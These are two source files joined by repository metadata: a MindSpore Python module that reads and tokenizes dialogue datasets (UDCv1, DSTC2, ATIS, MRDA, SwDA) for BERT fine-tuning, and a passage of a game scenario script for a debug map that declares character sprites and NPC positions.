] | permissive | mindspore-ai/models | 7ede9c6454e77e995e674628204e1c6e76bd7b27 | eab643f51336dbf7d711f02d27e6516e5affee59 | refs/heads/master | 2023-07-20T01:49:34.614616 | 2023-07-17T11:43:18 | 2023-07-17T11:43:18 | 417,393,380 | 301 | 92 | Apache-2.0 | 2023-05-17T11:22:28 | 2021-10-15T06:38:37 | Python | UTF-8 | Python | false | false | 21,879 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
dataset used in Bert finetune and evaluation.
"""
import json
import os
from typing import List

import numpy as np
# Input sequences begin with '[CLS]' and use '[SEP]' to split conversation
# content (previous part, current part, following part, etc.). When a split
# part itself contains multiple conversation turns, 'INNER_SEP' separates
# them.
INNER_SEP = '[unused0]'
class Dataset():
    """Abstract base class for the DGU datasets.

    Subclasses must implement ``__getitem__`` and ``__len__``; the base
    implementations raise ``NotImplementedError`` naming the missing hook
    and the concrete class.
    """
    def __init__(self):
        pass
    def _not_implemented(self, hook):
        # Shared error for the abstract hooks below.
        raise NotImplementedError(
            "'%s' not implement in class %s" % (hook, self.__class__.__name__))
    def __getitem__(self, idx):
        self._not_implemented('__getitem__')
    def __len__(self):
        self._not_implemented('__len__')
def get_label_map(label_list):
    """Map each label in *label_list* to its position index."""
    return {label: idx for idx, label in enumerate(label_list)}
class UDCv1(Dataset):
    """
    Dialogue Response Selection dataset over UDCv1 (Ubuntu Dialogue Corpus
    v1.0). See http://dataset.cs.mcgill.ca/ubuntu-corpus-1.0/

    Each row: "label\tconversation_turn1\t...\tresponse"; the last column is
    the candidate response, everything between label and response is context.
    """
    # Responses are clipped to this many word pieces before concatenation.
    MAX_LEN_OF_RESPONSE = 60
    LABEL_MAP = get_label_map(['0', '1'])
    def __init__(self, data_dir, mode='train', label_map_config=None):
        super(UDCv1, self).__init__()
        self._data_dir = data_dir
        self._mode = mode
        self.read_data()
        self.label_map = None
        if label_map_config:
            # Optional external label map (JSON file); requires the
            # top-level `import json`.
            with open(label_map_config) as f:
                self.label_map = json.load(f)
        else:
            self.label_map = None
    # Load the split file for the selected mode into self.data.
    def read_data(self):
        """Read (label, context_turns, response) triples from the split file."""
        if self._mode == 'train':
            data_path = os.path.join(self._data_dir, 'train.txt')
        elif self._mode == 'dev':
            # NOTE(review): dev uses 'dev.txt-small', unlike the other
            # datasets in this module — confirm this is intentional.
            data_path = os.path.join(self._data_dir, 'dev.txt-small')
        elif self._mode == 'test':
            data_path = os.path.join(self._data_dir, 'test.txt')
        self.data = []
        with open(data_path, 'r', encoding='utf8') as fin:
            for line in fin:
                if not line:
                    continue
                arr = line.rstrip('\n').split('\t')
                if len(arr) < 3:
                    # Malformed row: warn and skip.
                    print('Data format error: %s' % '\t'.join(arr))
                    print(
                        'Data row contains at least three parts: label\tconversation1\t.....\tresponse.'
                    )
                    continue
                label = arr[0]
                text_a = arr[1:-1]
                text_b = arr[-1]
                self.data.append([label, text_a, text_b])
    @classmethod
    def get_label(cls, label):
        return cls.LABEL_MAP[label]
    @classmethod
    def num_classes(cls):
        return len(cls.LABEL_MAP)
    @classmethod
    def convert_example(cls, example, tokenizer, max_seq_length=512):
        """Convert one (label, context, response) example into
        (input_ids, input_mask, segment_ids, label) features."""
        def _truncate_and_concat(text_a: List[str], text_b: str, tokenizer, max_seq_length):
            # Clip the response first; it always keeps its budget.
            tokens_b = tokenizer.tokenize(text_b)
            tokens_b = tokens_b[:min(cls.MAX_LEN_OF_RESPONSE, len(tokens_b))]
            # Join context turns with INNER_SEP (drop the trailing one).
            tokens_a = []
            for text in text_a:
                tokens_a.extend(tokenizer.tokenize(text))
                tokens_a.append(INNER_SEP)
            tokens_a = tokens_a[:-1]
            # Keep the most recent context; 3 = [CLS] + 2x[SEP].
            if len(tokens_a) > max_seq_length - len(tokens_b) - 3:
                tokens_a = tokens_a[len(tokens_a) - max_seq_length + len(tokens_b) + 3:]
            tokens, segment_ids = [], []
            tokens.append("[CLS]")
            segment_ids.append(0)
            for token in tokens_a:
                tokens.append(token)
                segment_ids.append(0)
            tokens.append("[SEP]")
            segment_ids.append(0)
            if tokens_b:
                # Response goes into segment 1.
                for token in tokens_b:
                    tokens.append(token)
                    segment_ids.append(1)
                tokens.append("[SEP]")
                segment_ids.append(1)
            input_ids = tokenizer.convert_tokens_to_ids(tokens)
            input_mask = [1] * len(input_ids)
            # Zero-pad all three sequences to max_seq_length.
            while len(input_ids) < max_seq_length:
                input_ids.append(0)
                input_mask.append(0)
                segment_ids.append(0)
            return input_ids, input_mask, segment_ids
        label, text_a, text_b = example
        label = np.array([cls.get_label(label)], dtype='int64')
        input_ids, input_mask, segment_ids = _truncate_and_concat(text_a, text_b, tokenizer, max_seq_length)
        return input_ids, input_mask, segment_ids, label
    def __getitem__(self, index):
        return self.data[index]
    def __len__(self):
        return len(self.data)
class DSTC2(Dataset):
    """
    Dialogue State Tracking dataset over DSTC2 (Dialog State Tracking
    Challenges 2). See https://github.com/matthen/dstc

    Each row: "dialogue_id\tquestion\1answer\tlabel1 label2 ..."; rows with
    the same id form one dialogue and are expanded into rolling-history
    samples. Multi-label targets (217 possible states) become a multi-hot
    vector in convert_example.
    """
    LABEL_MAP = get_label_map([str(i) for i in range(217)])
    def __init__(self, data_dir, mode='train'):
        super(DSTC2, self).__init__()
        self._data_dir = data_dir
        self._mode = mode
        self.read_data()
    def read_data(self):
        """Read one split file and expand each dialogue into history samples."""
        def _concat_dialogues(examples):
            """For each turn, prepend up to 20 preceding turns of the same
            dialogue; the sample keeps the current turn's labels."""
            new_examples = []
            max_turns = 20
            example_len = len(examples)
            for i in range(example_len):
                multi_turns = examples[max(i - max_turns, 0):i + 1]
                new_qa = '\1'.join([example[0] for example in multi_turns])
                new_examples.append((new_qa.split('\1'), examples[i][1]))
            return new_examples
        if self._mode == 'train':
            data_path = os.path.join(self._data_dir, 'train.txt')
        elif self._mode == 'dev':
            data_path = os.path.join(self._data_dir, 'dev.txt')
        elif self._mode == 'test':
            data_path = os.path.join(self._data_dir, 'test.txt')
        self.data = []
        with open(data_path, 'r', encoding='utf8') as fin:
            pre_idx = -1
            examples = []
            for line in fin:
                if not line:
                    continue
                arr = line.rstrip('\n').split('\t')
                if len(arr) != 3:
                    print('Data format error: %s' % '\t'.join(arr))
                    print(
                        'Data row should contains three parts: id\tquestion\1answer\tlabel1 label2 ...'
                    )
                    continue
                idx = arr[0]
                qa = arr[1]
                label_list = arr[2].split()
                if idx != pre_idx:
                    # A new dialogue id: flush the buffered dialogue.
                    # NOTE(review): idx is a string, so `idx != 0` is always
                    # true; harmless here because `examples` is empty on the
                    # first dialogue, but the check is dead code.
                    if idx != 0:
                        examples = _concat_dialogues(examples)
                        self.data.extend(examples)
                        examples = []
                    pre_idx = idx
                examples.append((qa, label_list))
            if examples:
                # Flush the final dialogue.
                examples = _concat_dialogues(examples)
                self.data.extend(examples)
    @classmethod
    def get_label(cls, label):
        return cls.LABEL_MAP[label]
    @classmethod
    def num_classes(cls):
        return len(cls.LABEL_MAP)
    @classmethod
    def convert_example(cls, example, tokenizer, max_seq_length=512):
        """Convert one (turn_texts, labels) example into
        (input_ids, input_mask, segment_ids, multi_hot_label) features."""
        def _truncate_and_concat(texts: List[str], tokenizer, max_seq_length):
            # Join all turns with INNER_SEP (drop the trailing one).
            tokens = []
            for text in texts:
                tokens.extend(tokenizer.tokenize(text))
                tokens.append(INNER_SEP)
            tokens = tokens[:-1]
            # Keep the most recent tokens; 2 = [CLS] + [SEP].
            if len(tokens) > max_seq_length - 2:
                tokens = tokens[len(tokens) - max_seq_length + 2:]
            tokens_, segment_ids = [], []
            tokens_.append("[CLS]")
            segment_ids.append(0)
            for token in tokens:
                tokens_.append(token)
                segment_ids.append(0)
            tokens_.append("[SEP]")
            segment_ids.append(0)
            tokens = tokens_
            input_ids = tokenizer.convert_tokens_to_ids(tokens)
            return input_ids, segment_ids
        texts, labels = example
        input_ids, segment_ids = _truncate_and_concat(texts, tokenizer,
                                                      max_seq_length)
        # Multi-hot target over all tracked states.
        labels = [cls.get_label(l) for l in labels]
        label = np.zeros(cls.num_classes(), dtype='int64')
        for l in labels:
            label[l] = 1
        input_mask = [1] * len(input_ids)
        # Zero-pad to max_seq_length.
        while len(input_ids) < max_seq_length:
            input_ids.append(0)
            input_mask.append(0)
            segment_ids.append(0)
        return input_ids, input_mask, segment_ids, label
    def __getitem__(self, index):
        return self.data[index]
    def __len__(self):
        return len(self.data)
class ATIS_DSF(Dataset):
    """
    Dialogue Slot Filling dataset over ATIS (Airline Travel Information
    System). See https://www.kaggle.com/siddhadev/ms-cntk-atis

    Each row: "utterance\tlabel1 label2 ..." with exactly one slot label per
    whitespace-separated word.
    """
    LABEL_MAP = get_label_map([str(i) for i in range(130)])
    def __init__(self, data_dir, mode='train'):
        super(ATIS_DSF, self).__init__()
        self._data_dir = data_dir
        self._mode = mode
        self.read_data()
    def read_data(self):
        """Read (utterance, slot_labels) pairs for the selected split."""
        if self._mode == 'train':
            data_path = os.path.join(self._data_dir, 'train.txt')
        elif self._mode == 'dev':
            data_path = os.path.join(self._data_dir, 'dev.txt')
        elif self._mode == 'test':
            data_path = os.path.join(self._data_dir, 'test.txt')
        self.data = []
        with open(data_path, 'r', encoding='utf8') as fin:
            for line in fin:
                if not line:
                    continue
                arr = line.rstrip('\n').split('\t')
                if len(arr) != 2:
                    # Malformed row: warn and skip.
                    print('Data format error: %s' % '\t'.join(arr))
                    print(
                        'Data row should contains two parts: conversation_content\tlabel1 label2 label3.'
                    )
                    continue
                text = arr[0]
                label_list = arr[1].split()
                self.data.append([text, label_list])
    @classmethod
    def get_label(cls, label):
        return cls.LABEL_MAP[label]
    @classmethod
    def num_classes(cls):
        return len(cls.LABEL_MAP)
    @classmethod
    def convert_example(cls, example, tokenizer, max_seq_length=512):
        """Convert one (utterance, word_labels) example into
        (input_ids, input_mask, segment_ids, token_labels) features.

        Each word's slot label is replicated onto all of its word pieces.
        """
        text, labels = example
        tokens, label_list = [], []
        words = text.split()
        assert len(words) == len(labels)
        for word, label in zip(words, labels):
            piece_words = tokenizer.tokenize(word)
            tokens.extend(piece_words)
            label = cls.get_label(label)
            label_list.extend([label] * len(piece_words))
        if len(tokens) > max_seq_length - 2:
            # BUG FIX: truncate labels by the same amount as tokens. The old
            # code recomputed len(tokens) AFTER tokens were truncated, so
            # the label slice start was always 0 and label_list kept its
            # full length, mismatching input_ids.
            overflow = len(tokens) - (max_seq_length - 2)
            tokens = tokens[overflow:]
            label_list = label_list[overflow:]
        tokens_, segment_ids = [], []
        tokens_.append("[CLS]")
        for token in tokens:
            tokens_.append(token)
        tokens_.append("[SEP]")
        tokens = tokens_
        # [CLS]/[SEP] carry the padding label 0.
        label_list = [0] + label_list + [0]
        segment_ids = [0] * len(tokens)
        input_ids = tokenizer.convert_tokens_to_ids(tokens)
        label = np.array(label_list, dtype='int64')
        input_mask = [1] * len(input_ids)
        # Zero-pad to max_seq_length (labels stay at token length).
        while len(input_ids) < max_seq_length:
            input_ids.append(0)
            input_mask.append(0)
            segment_ids.append(0)
        return input_ids, input_mask, segment_ids, label
    def __getitem__(self, index):
        return self.data[index]
    def __len__(self):
        return len(self.data)
class ATIS_DID(Dataset):
    """
    Dialogue Intent Detection dataset over ATIS (Airline Travel Information
    System). See https://www.kaggle.com/siddhadev/ms-cntk-atis

    Each row: "label\tconversation_content" with one of 26 intent labels.
    """
    LABEL_MAP = get_label_map([str(i) for i in range(26)])
    def __init__(self, data_dir, mode='train'):
        super(ATIS_DID, self).__init__()
        self._data_dir = data_dir
        self._mode = mode
        self.read_data()
    def read_data(self):
        """Read (label, text) pairs for the selected split."""
        if self._mode == 'train':
            data_path = os.path.join(self._data_dir, 'train.txt')
        elif self._mode == 'dev':
            data_path = os.path.join(self._data_dir, 'dev.txt')
        elif self._mode == 'test':
            data_path = os.path.join(self._data_dir, 'test.txt')
        self.data = []
        with open(data_path, 'r', encoding='utf8') as fin:
            for line in fin:
                if not line:
                    continue
                arr = line.rstrip('\n').split('\t')
                if len(arr) != 2:
                    # Malformed row: warn and skip.
                    print('Data format error: %s' % '\t'.join(arr))
                    print(
                        'Data row should contains two parts: label\tconversation_content.'
                    )
                    continue
                label = arr[0]
                text = arr[1]
                self.data.append([label, text])
    @classmethod
    def get_label(cls, label):
        return cls.LABEL_MAP[label]
    @classmethod
    def num_classes(cls):
        return len(cls.LABEL_MAP)
    @classmethod
    def convert_example(cls, example, tokenizer, max_seq_length=512):
        """Convert one (label, text) example into
        (input_ids, input_mask, segment_ids, label) features."""
        label, text = example
        tokens = tokenizer.tokenize(text)
        # Keep the most recent tokens; 2 = [CLS] + [SEP].
        if len(tokens) > max_seq_length - 2:
            tokens = tokens[len(tokens) - max_seq_length + 2:]
        tokens_, segment_ids = [], []
        tokens_.append("[CLS]")
        for token in tokens:
            tokens_.append(token)
        tokens_.append("[SEP]")
        tokens = tokens_
        segment_ids = [0] * len(tokens)
        input_ids = tokenizer.convert_tokens_to_ids(tokens)
        label = np.array([cls.get_label(label)], dtype='int64')
        input_mask = [1] * len(input_ids)
        # Zero-pad to max_seq_length.
        while len(input_ids) < max_seq_length:
            input_ids.append(0)
            input_mask.append(0)
            segment_ids.append(0)
        return input_ids, input_mask, segment_ids, label
    def __getitem__(self, index):
        return self.data[index]
    def __len__(self):
        return len(self.data)
def read_da_data(data_dir, mode):
    """Read a Dialogue Act split file into context-window samples.

    Each row: "id\tlabel\tcaller\tconversation_content"; rows with the same
    id form one dialogue. Every turn becomes a sample
    (label, previous_turns, current_turn, following_turns) with up to 5
    preceding and 2 following turns rendered as "caller : text".
    """
    def _concat_dialogues(examples):
        """Build the context window around each turn of one dialogue."""
        new_examples = []
        example_len = len(examples)
        for i in range(example_len):
            label, caller, text = examples[i]
            cur_txt = "%s : %s" % (caller, text)
            pre_txt = [
                "%s : %s" % (item[1], item[2])
                for item in examples[max(0, i - 5):i]
            ]
            suf_txt = [
                "%s : %s" % (item[1], item[2])
                for item in examples[i + 1:min(len(examples), i + 3)]
            ]
            sample = [label, pre_txt, cur_txt, suf_txt]
            new_examples.append(sample)
        return new_examples
    if mode == 'train':
        data_path = os.path.join(data_dir, 'train.txt')
    elif mode == 'dev':
        data_path = os.path.join(data_dir, 'dev.txt')
    elif mode == 'test':
        data_path = os.path.join(data_dir, 'test.txt')
    data = []
    with open(data_path, 'r', encoding='utf8') as fin:
        pre_idx = -1
        examples = []
        for line in fin:
            if not line:
                continue
            arr = line.rstrip('\n').split('\t')
            if len(arr) != 4:
                # Malformed row: warn and skip.
                print('Data format error: %s' % '\t'.join(arr))
                print(
                    'Data row should contains four parts: id\tlabel\tcaller\tconversation_content.'
                )
                continue
            idx, label, caller, text = arr
            if idx != pre_idx:
                # A new dialogue id: flush the buffered dialogue.
                # NOTE(review): idx is a string, so `idx != 0` is always
                # true; harmless because `examples` is empty for the first
                # dialogue, but the check is dead code.
                if idx != 0:
                    examples = _concat_dialogues(examples)
                    data.extend(examples)
                    examples = []
                pre_idx = idx
            examples.append((label, caller, text))
        if examples:
            # Flush the final dialogue.
            examples = _concat_dialogues(examples)
            data.extend(examples)
    return data
def truncate_and_concat(pre_txt: List[str],
                        cur_txt: str,
                        suf_txt: List[str],
                        tokenizer,
                        max_seq_length,
                        max_len_of_cur_text):
    """Tokenize and pack (previous turns, current turn, following turns)
    into BERT-style inputs.

    The current turn is clipped to max_len_of_cur_text and always keeps its
    budget; the remaining space is split between context before and after,
    trimming the longer side first. Layout:
    [CLS] pre [SEP] cur [SEP] (suf [SEP]) with segment ids 0/1/0.
    Returns (input_ids, input_mask, segment_ids), zero-padded to
    max_seq_length.
    """
    cur_tokens = tokenizer.tokenize(cur_txt)
    cur_tokens = cur_tokens[:min(max_len_of_cur_text, len(cur_tokens))]
    # Join surrounding turns with INNER_SEP (drop the trailing one).
    pre_tokens = []
    for text in pre_txt:
        pre_tokens.extend(tokenizer.tokenize(text))
        pre_tokens.append(INNER_SEP)
    pre_tokens = pre_tokens[:-1]
    suf_tokens = []
    for text in suf_txt:
        suf_tokens.extend(tokenizer.tokenize(text))
        suf_tokens.append(INNER_SEP)
    suf_tokens = suf_tokens[:-1]
    # 4 = [CLS] + 3x[SEP]. Split the leftover budget between pre and suf,
    # halving the shorter side first so the longer side gets the remainder.
    # pre keeps its most recent tokens, suf its earliest.
    if len(cur_tokens) + len(pre_tokens) + len(suf_tokens) > max_seq_length - 4:
        left_num = max_seq_length - 4 - len(cur_tokens)
        if len(pre_tokens) > len(suf_tokens):
            suf_num = int(left_num / 2)
            suf_tokens = suf_tokens[:suf_num]
            pre_num = left_num - len(suf_tokens)
            pre_tokens = pre_tokens[max(0, len(pre_tokens) - pre_num):]
        else:
            pre_num = int(left_num / 2)
            pre_tokens = pre_tokens[max(0, len(pre_tokens) - pre_num):]
            suf_num = left_num - len(pre_tokens)
            suf_tokens = suf_tokens[:suf_num]
    tokens, segment_ids = [], []
    tokens.append("[CLS]")
    for token in pre_tokens:
        tokens.append(token)
    tokens.append("[SEP]")
    segment_ids.extend([0] * len(tokens))
    # The current turn is segment 1 so the model can distinguish it.
    for token in cur_tokens:
        tokens.append(token)
    tokens.append("[SEP]")
    segment_ids.extend([1] * (len(cur_tokens) + 1))
    if suf_tokens:
        for token in suf_tokens:
            tokens.append(token)
        tokens.append("[SEP]")
        segment_ids.extend([0] * (len(suf_tokens) + 1))
    input_ids = tokenizer.convert_tokens_to_ids(tokens)
    input_mask = [1] * len(input_ids)
    # Zero-pad to max_seq_length.
    while len(input_ids) < max_seq_length:
        input_ids.append(0)
        input_mask.append(0)
        segment_ids.append(0)
    return input_ids, input_mask, segment_ids
class MRDA(Dataset):
    """Dialogue Act dataset over MRDA (Meeting Recorder Dialogue Act).

    See https://www.aclweb.org/anthology/W04-2319.pdf for the corpus.
    Samples come from read_da_data as (label, previous turns, current turn,
    following turns); 5 act classes.
    """
    MAX_LEN_OF_CUR_TEXT = 50
    LABEL_MAP = get_label_map([str(i) for i in range(5)])
    def __init__(self, data_dir, mode='train'):
        super(MRDA, self).__init__()
        self.data = read_da_data(data_dir, mode)
    @classmethod
    def get_label(cls, label):
        # Textual label -> integer id.
        return cls.LABEL_MAP[label]
    @classmethod
    def num_classes(cls):
        return len(cls.LABEL_MAP)
    @classmethod
    def convert_example(cls, example, tokenizer, max_seq_length=512):
        """Turn one sample into (input_ids, input_mask, segment_ids, label)."""
        raw_label, prev_turns, cur_turn, next_turns = example
        label = np.array([cls.get_label(raw_label)], dtype='int64')
        encoded = truncate_and_concat(prev_turns, cur_turn, next_turns,
                                      tokenizer, max_seq_length,
                                      cls.MAX_LEN_OF_CUR_TEXT)
        input_ids, input_mask, segment_ids = encoded
        return input_ids, input_mask, segment_ids, label
    def __getitem__(self, index):
        return self.data[index]
    def __len__(self):
        return len(self.data)
class SwDA(Dataset):
    """Dialogue Act dataset over SwDA (Switchboard Dialog Act).

    See http://compprag.christopherpotts.net/swda.html for the corpus.
    Samples come from read_da_data as (label, previous turns, current turn,
    following turns); 42 act classes.
    """
    MAX_LEN_OF_CUR_TEXT = 50
    LABEL_MAP = get_label_map([str(i) for i in range(42)])
    def __init__(self, data_dir, mode='train'):
        super(SwDA, self).__init__()
        self.data = read_da_data(data_dir, mode)
    @classmethod
    def get_label(cls, label):
        # Textual label -> integer id.
        return cls.LABEL_MAP[label]
    @classmethod
    def num_classes(cls):
        return len(cls.LABEL_MAP)
    @classmethod
    def convert_example(cls, example, tokenizer, max_seq_length=512):
        """Turn one sample into (input_ids, input_mask, segment_ids, label)."""
        raw_label, prev_turns, cur_turn, next_turns = example
        label = np.array([cls.get_label(raw_label)], dtype='int64')
        encoded = truncate_and_concat(prev_turns, cur_turn, next_turns,
                                      tokenizer, max_seq_length,
                                      cls.MAX_LEN_OF_CUR_TEXT)
        input_ids, input_mask, segment_ids = encoded
        return input_ids, input_mask, segment_ids, label
    def __getitem__(self, index):
        return self.data[index]
    def __len__(self):
        return len(self.data)
| [
"[email protected]"
] | |
fe617ba47c9efdffab6c275fdc564daa8bb65ee9 | 80301f1cffc5afce13256e2ecab6323c5df00194 | /cn.3rd/py/A0024.py | 35dc33ee31bc4810216c072c4f632d116a8f110f | [] | no_license | ZhenjianYang/SoraVoiceScripts | c1ddf7c1bbcb933243754f9669bd6b75777c87b9 | 94a948090aba0f63b10b2c69dc845dc99c822fc4 | refs/heads/master | 2023-04-18T04:54:44.306652 | 2023-04-06T11:15:17 | 2023-04-06T11:15:17 | 103,167,541 | 43 | 11 | null | 2021-03-06T08:52:54 | 2017-09-11T17:36:55 | Python | UTF-8 | Python | false | false | 27,855 | py | from ED63RDScenarioHelper import *
def main():
SetCodePage("gbk")
# 调试地图
CreateScenaFile(
FileName = 'A0024 ._SN',
MapName = 'map1',
Location = 'T0030.x',
MapIndex = 1,
MapDefaultBGM = "ed60010",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'04580尤莉亚待机', # 9
'04581尤莉亚移动', # 10
'04582尤莉亚攻击', # 11
'04583尤莉亚被弹开', # 12
'04584尤莉亚倒下', # 13
'04585尤莉亚魔法咏唱', # 14
'04586尤莉亚魔法发动', # 15
'04570穆拉待机', # 16
'04571穆拉移动', # 17
'04572穆拉攻击', # 18
'04573穆拉被弹开', # 19
'04574穆拉倒下', # 20
'04575穆拉魔法咏唱', # 21
'04576穆拉魔法发动', # 22
'04590希德待机', # 23
'04591希德移动', # 24
'04592希德攻击', # 25
'04593希德被弹开', # 26
'04594希德倒下', # 27
'04595希德魔法咏唱', # 28
'04596希德魔法发动', # 29
'04120凯诺娜待机', # 30
'04121凯诺娜移动', # 31
'04122凯诺娜攻击', # 32
'04123凯诺娜被弹开', # 33
'04124凯诺娜倒下', # 34
'04125凯诺娜魔法咏唱', # 35
'04126凯诺娜魔法发动', # 36
)
DeclEntryPoint(
Unknown_00 = 0,
Unknown_04 = 0,
Unknown_08 = 0,
Unknown_0C = 4,
Unknown_0E = 5,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 315,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 0,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT27/CH04580 ._CH', # 00
'ED6_DT27/CH04581 ._CH', # 01
'ED6_DT27/CH04582 ._CH', # 02
'ED6_DT27/CH04583 ._CH', # 03
'ED6_DT27/CH04584 ._CH', # 04
'ED6_DT27/CH04585 ._CH', # 05
'ED6_DT27/CH04586 ._CH', # 06
'ED6_DT27/CH04583 ._CH', # 07
'ED6_DT27/CH04583 ._CH', # 08
'ED6_DT27/CH04583 ._CH', # 09
'ED6_DT27/CH04570 ._CH', # 0A
'ED6_DT27/CH04571 ._CH', # 0B
'ED6_DT27/CH04572 ._CH', # 0C
'ED6_DT27/CH04573 ._CH', # 0D
'ED6_DT27/CH04574 ._CH', # 0E
'ED6_DT27/CH04575 ._CH', # 0F
'ED6_DT27/CH04576 ._CH', # 10
'ED6_DT27/CH04573 ._CH', # 11
'ED6_DT27/CH04573 ._CH', # 12
'ED6_DT27/CH04573 ._CH', # 13
'ED6_DT27/CH04590 ._CH', # 14
'ED6_DT27/CH04591 ._CH', # 15
'ED6_DT27/CH04592 ._CH', # 16
'ED6_DT27/CH04593 ._CH', # 17
'ED6_DT27/CH04594 ._CH', # 18
'ED6_DT27/CH04595 ._CH', # 19
'ED6_DT27/CH04596 ._CH', # 1A
'ED6_DT27/CH04593 ._CH', # 1B
'ED6_DT27/CH04593 ._CH', # 1C
'ED6_DT27/CH04593 ._CH', # 1D
'ED6_DT27/CH04120 ._CH', # 1E
'ED6_DT27/CH04121 ._CH', # 1F
'ED6_DT27/CH04122 ._CH', # 20
'ED6_DT27/CH04123 ._CH', # 21
'ED6_DT27/CH04124 ._CH', # 22
'ED6_DT27/CH04125 ._CH', # 23
'ED6_DT27/CH04126 ._CH', # 24
'ED6_DT27/CH04123 ._CH', # 25
'ED6_DT27/CH04123 ._CH', # 26
'ED6_DT27/CH04123 ._CH', # 27
)
AddCharChipPat(
'ED6_DT27/CH04580P._CP', # 00
'ED6_DT27/CH04581P._CP', # 01
'ED6_DT27/CH04582P._CP', # 02
'ED6_DT27/CH04583P._CP', # 03
'ED6_DT27/CH04584P._CP', # 04
'ED6_DT27/CH04585P._CP', # 05
'ED6_DT27/CH04586P._CP', # 06
'ED6_DT27/CH04583P._CP', # 07
'ED6_DT27/CH04583P._CP', # 08
'ED6_DT27/CH04583P._CP', # 09
'ED6_DT27/CH04570P._CP', # 0A
'ED6_DT27/CH04571P._CP', # 0B
'ED6_DT27/CH04572P._CP', # 0C
'ED6_DT27/CH04573P._CP', # 0D
'ED6_DT27/CH04574P._CP', # 0E
'ED6_DT27/CH04575P._CP', # 0F
'ED6_DT27/CH04576P._CP', # 10
'ED6_DT27/CH04573P._CP', # 11
'ED6_DT27/CH04573P._CP', # 12
'ED6_DT27/CH04573P._CP', # 13
'ED6_DT27/CH04590P._CP', # 14
'ED6_DT27/CH04591P._CP', # 15
'ED6_DT27/CH04592P._CP', # 16
'ED6_DT27/CH04593P._CP', # 17
'ED6_DT27/CH04594P._CP', # 18
'ED6_DT27/CH04595P._CP', # 19
'ED6_DT27/CH04596P._CP', # 1A
'ED6_DT27/CH04593P._CP', # 1B
'ED6_DT27/CH04593P._CP', # 1C
'ED6_DT27/CH04593P._CP', # 1D
'ED6_DT27/CH04120P._CP', # 1E
'ED6_DT27/CH04121P._CP', # 1F
'ED6_DT27/CH04122P._CP', # 20
'ED6_DT27/CH04123P._CP', # 21
'ED6_DT27/CH04124P._CP', # 22
'ED6_DT27/CH04125P._CP', # 23
'ED6_DT27/CH04126P._CP', # 24
'ED6_DT27/CH04123P._CP', # 25
'ED6_DT27/CH04123P._CP', # 26
'ED6_DT27/CH04123P._CP', # 27
)
DeclNpc(
X = 4000,
Z = 0,
Y = 4000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 8000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 1,
ChipIndex = 0x1,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 12000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 2,
ChipIndex = 0x2,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 16000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 3,
ChipIndex = 0x3,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 4,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 20000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 4,
ChipIndex = 0x4,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 5,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 24000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 5,
ChipIndex = 0x5,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 6,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 28000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 6,
ChipIndex = 0x6,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 7,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 4000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 10,
ChipIndex = 0xA,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 8000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 11,
ChipIndex = 0xB,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 12000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 12,
ChipIndex = 0xC,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 16000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 13,
ChipIndex = 0xD,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 4,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
